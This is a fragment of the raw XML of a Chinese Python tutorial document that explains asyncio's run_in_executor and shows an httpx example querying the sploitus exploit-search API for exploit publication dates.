          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的结果就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的返回值，也就是文件的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D15F4" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197867CA" w14:textId="38DFEA96" w:rsidR="005A08ED" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data = await loop.run_in_executor(None, file.read) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这行代码的意思就是：将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的执行委托给一个线程，然后等待它的结果，将结果赋值给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5CD20" w14:textId="77777777" w:rsidR="005A08ED" w:rsidRPr="005A08ED" w:rsidRDefault="005A08ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3937351F" w14:textId="4F1C6CF7" w:rsidR="007215D1" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="536" w:name="_Toc159779973"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>
    </w:p>
    <w:p w14:paraId="0EDBB612" w14:textId="77777777" w:rsidR="004B0351" w:rsidRDefault="004B0351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8D3ED3" w14:textId="77777777" w:rsidR="002C6EFC" w:rsidRDefault="002C6EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB68DFD" w14:textId="77777777" w:rsidR="002C6EFC" w:rsidRDefault="002C6EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B83FCBB" w14:textId="77777777" w:rsidR="002C6EFC" w:rsidRDefault="002C6EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>httpx.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proxies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=proxies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        response = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"type"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"sort"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"date"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"query"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"cve"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"title"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"offset"</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=headers)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res_json = response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</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res_list = []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        exps = res_json[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">single_exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exps:</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>None</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single_exp_date = single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</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res_list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(single_exp_date)</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, res_list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">task_list = [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=url, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">*x) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
